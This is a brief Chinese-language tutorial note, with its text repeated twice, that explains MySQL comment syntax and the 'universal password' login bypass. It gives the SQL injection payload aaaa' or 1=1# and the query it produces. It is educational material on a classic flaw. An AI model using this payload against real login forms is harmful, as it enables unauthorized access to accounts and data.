万能密码漏洞
mysql注释方式
1 单行注释:#
第二种单行注释方式用"-- "下划线后面有一个空格
2 多行注释:/**/
万能密码
aaaa’ or 1=1#
在SQL语句用户名判断的时候。
SELECT *FROM user WHERE username=‘aaaa’ or 1=1# and userpass=‘53534554456’ #后面的就会被当成是注释,而 or 1=1恒成立 。
所以会执行成功。
mysql注释方式
1 单行注释:#
第二种单行注释方式用"-- "下划线后面有一个空格
2 多行注释:/**/
aaaa’ or 1=1#
在SQL语句用户名判断的时候。
SELECT *FROM user WHERE username=‘aaaa’ or 1=1# and userpass=‘53534554456’ #后面的就会被当成是注释,而 or 1=1恒成立 。
所以会执行成功。